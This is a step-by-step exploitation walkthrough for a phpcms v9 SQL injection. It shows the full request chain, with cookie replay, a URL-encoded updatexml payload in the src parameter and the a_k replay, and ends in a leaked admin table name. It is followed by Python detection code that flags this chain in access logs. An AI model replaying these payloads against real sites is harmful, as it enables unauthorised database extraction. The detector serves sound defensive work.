phpcms v9 injection

GET /phpcms/index.php?m=wap&c=index&a=init&siteid=1 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: nYbXT_siteid=8f34EZvyi7oJBh8g69s3wO0YGxWeF_ohQ8serAzU; CNZZDATA1256104530=

First, request the URL above; the response is as follows:

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 17:29:08 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Set-Cookie: nYbXT_siteid=a504MiYFpsbeMmu-WUkntLfOSbQAJa61keJ3OvHN
Vary: Accept-Encoding
Content-Length: 35
Content-Type: text/html; charset=gbk

你访问的站点不存在或者未开启wap访问

Copy the cookie value highlighted in red in the response above (the nYbXT_siteid value from the Set-Cookie header).

Then send the following request:

POST /phpcms/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3D%25%2A27%20and%20updatexml%281%2CCONCAT%281%2C%28SELECT%20table_name%20FROM%20information_schema.%60TABLES%60%20WHERE%20RIGHT%28table_name%2C10%29%3D%25%2A27admin_role%25%2A27%20LIMIT%200%2C1%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26  HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: nYbXT_siteid=1464mbfPNyq9TWB2vKrI0h9yNabsKQf8NI4dqH3c; CNZZDATA1256104530=
Content-Length: 57

userid_flash=a504MiYFpsbeMmu-WUkntLfOSbQAJa61keJ3OvHN

The src parameter above carries the SQL injection statement; the userid_flash value in the POST body is the red cookie value copied from the previous response.

The response is as follows:

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 17:30:02 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Set-Cookie: PHPSESSID=oj9abeufn86ajm9md7a2n8bjl4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: nYbXT_att_json=361aaa6lxxMUbdOiRKJjYjqdfLNj00tx1X6SSMesMq_-CijdCEwNjdwuPRyRpX-0E_xaXKzDfp1Bd-oAcmU73m91J-SA50PFYL-seSNzmnNqLEaBwILc3Nv00Eeg4a86xm3Jy_37V9YErAhYTFM7HEyHppebJGjwX-MlGr82wA8xOmR9P3Xm3HVQNdyPm57PUbuKBLJL1ZEoJXTLrpPWHpSFg2aXp32hU30c3TuXv_DQvzDYbUKZvZiFSSxgY4Le7IwgEyfeZzlfpOdtHUquuaVs-idCILJSNEq_6pKfqpX7Gz0edoDEuhYQLQ
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=gbk

Copy the highlighted value above (the nYbXT_att_json cookie) into the a_k parameter of the following payload to complete the injection.

GET /phpcms//index.php?m=content&c=down&a_k=361aaa6lxxMUbdOiRKJjYjqdfLNj00tx1X6SSMesMq_-CijdCEwNjdwuPRyRpX-0E_xaXKzDfp1Bd-oAcmU73m91J-SA50PFYL-seSNzmnNqLEaBwILc3Nv00Eeg4a86xm3Jy_37V9YErAhYTFM7HEyHppebJGjwX-MlGr82wA8xOmR9P3Xm3HVQNdyPm57PUbuKBLJL1ZEoJXTLrpPWHpSFg2aXp32hU30c3TuXv_DQvzDYbUKZvZiFSSxgY4Le7IwgEyfeZzlfpOdtHUquuaVs-idCILJSNEq_6pKfqpX7Gz0edoDEuhYQLQ HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: nYbXT_siteid=; CNZZDATA1256104530=

Response:

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 17:30:10 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Vary: Accept-Encoding
Content-Length: 685
Content-Type: text/html; charset=gbk

<div style="font-size:12px;text-align:left; border:1px solid #9cc9e0; padding:1px 4px;color:#000000;font-family:Arial, Helvetica,sans-serif;"><span><b>MySQL Query : </b> SELECT * FROM `phpcms`.`v9_download_data` WHERE  `id` = '' and updatexml(1,CONCAT(1,(SELECT table_name FROM information_schema.`TABLES` WHERE RIGHT(table_name,10)='admin_role' LIMIT 0,1)),1)#' LIMIT 1 <br /><b> MySQL Error : </b>XPATH syntax error: 'v9_admin_role' <br /> <b>MySQL Errno : </b>1105 <br /><b> Message : </b> XPATH syntax error: 'v9_admin_role' <br /><a href='http://faq.phpcms.cn/?errno=1105&msg=XPATH+syntax+error%3A+%27v9_admin_role%27' target='_blank' style='color:red'>Need Help?</a></span></div>
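As an added defender-side example (this is not part of the original writeup and is not phpcms code), the Python below scans constructed Apache-style access-log lines modelled on the three requests above. It flags the src parameter of the swfupload_json request by two properties visible in the capture: the %*27 sequence that remains after one round of URL decoding (the capture sends it as %25%2A27, and the '*' stops a normal decoder from turning it into a quote) and SQL keywords such as updatexml and information_schema in the decoded value. Because the a_k token is opaque, the follow-up content/down request is only reported when the same client previously sent a tainted swfupload_json request. A helper also recognises the verbose MySQL error block returned in the final response, which is worth alerting on regardless of the request. The client addresses, timestamps, the benign fourth request and the OPAQUE_TOKEN_PLACEHOLDER value in the sample lines are constructed; the src payload is the one shown on this page.

```python
"""Detection of the phpcms v9 request chain shown above, run over constructed log lines."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# SQL fragments that have no business in a CMS query string (all present in the page's src payload).
SQL_MARKERS = ("updatexml(", "extractvalue(", "information_schema", "select ", "union ")

# A quote that survives one decode round as %*27 (or %*22): the '*' between '%' and the hex
# digits keeps urllib from decoding it, which is why it is still visible in the captured request.
STAR_ENCODED_QUOTE = re.compile(r"%\*2[27]", re.IGNORECASE)

# Apache combined-log prefix: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Verbose MySQL error block as rendered in the final response on the page.
MYSQL_ERROR = re.compile(r"MySQL (Query|Error|Errno) :")


def analyse_target(target):
    """Return a list of findings for one request target (path plus query string)."""
    findings = []
    query = urlsplit(target).query
    # parse_qsl performs the first URL-decode round; %25%2A27 becomes %*27 here.
    for key, once in parse_qsl(query, keep_blank_values=True):
        if STAR_ENCODED_QUOTE.search(once):
            findings.append(f"star-encoded quote in '{key}'")
        # A second round catches payloads that were encoded three times.
        twice = unquote(once).lower()
        hits = [marker for marker in SQL_MARKERS if marker in twice]
        if hits:
            findings.append(f"sql markers in '{key}': {', '.join(hits)}")
    return findings


def phpcms_stage(target):
    """Classify a request as stage1 (swfupload_json with src) or stage2 (content/down with a_k)."""
    params = dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    if params.get("m") == "attachment" and params.get("a") == "swfupload_json" and "src" in params:
        return "stage1"
    if params.get("m") == "content" and params.get("c") == "down" and "a_k" in params:
        return "stage2"
    return None


def scan_log(lines):
    """Return (client, message) alerts; stage2 is reported only after a tainted stage1 by the same client."""
    alerts = []
    tainted_clients = set()
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        client, target = match["client"], match["target"]
        stage = phpcms_stage(target)
        findings = analyse_target(target)
        if stage == "stage1" and findings:
            tainted_clients.add(client)
            alerts.append((client, "swfupload_json src carries injection payload: " + "; ".join(findings)))
        elif stage == "stage2" and client in tainted_clients:
            alerts.append((client, "content/down a_k replay after tainted swfupload_json (chain complete)"))
        elif findings:
            alerts.append((client, "; ".join(findings)))
    return alerts


def response_leaks_sql(body):
    """True when a response body exposes the executed query or MySQL error text."""
    return bool(MYSQL_ERROR.search(body))


# Constructed sample lines modelled on the page's three requests plus one benign request.
# Client addresses, timestamps and the a_k placeholder are made up; the src payload is the page's.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Apr/2017:17:29:08 +0000] "GET /phpcms/index.php?m=wap&c=index&a=init&siteid=1 HTTP/1.1" 200 35',
    '10.0.0.5 - - [11/Apr/2017:17:30:02 +0000] "POST /phpcms/index.php?m=attachment&c=attachments'
    '&a=swfupload_json&aid=1&src=%26id%3D%25%2A27%20and%20updatexml%281%2CCONCAT%281%2C%28SELECT%20table_name'
    '%20FROM%20information_schema.%60TABLES%60%20WHERE%20RIGHT%28table_name%2C10%29%3D%25%2A27admin_role'
    '%25%2A27%20LIMIT%200%2C1%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26 HTTP/1.1" 200 0',
    '10.0.0.5 - - [11/Apr/2017:17:30:10 +0000] "GET /phpcms//index.php?m=content&c=down&a_k=OPAQUE_TOKEN_PLACEHOLDER HTTP/1.1" 200 685',
    '10.0.0.9 - - [11/Apr/2017:17:31:00 +0000] "GET /phpcms/index.php?m=content&c=index&a=lists&catid=7 HTTP/1.1" 200 4120',
]

if __name__ == "__main__":
    for client, message in scan_log(SAMPLE_LOG):
        print(client, message)
```

Running the block prints two alerts for 10.0.0.5 (the tainted swfupload_json request and the completed chain) and nothing for the benign client. The a_k correlation is deliberately keyed on a prior tainted request rather than on the token, and the response-side check gives a second signal that does not depend on the request at all.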

This exploitation walkthrough comes from www.myhack58.com/Article/html/3/8/2017/85138_2.htm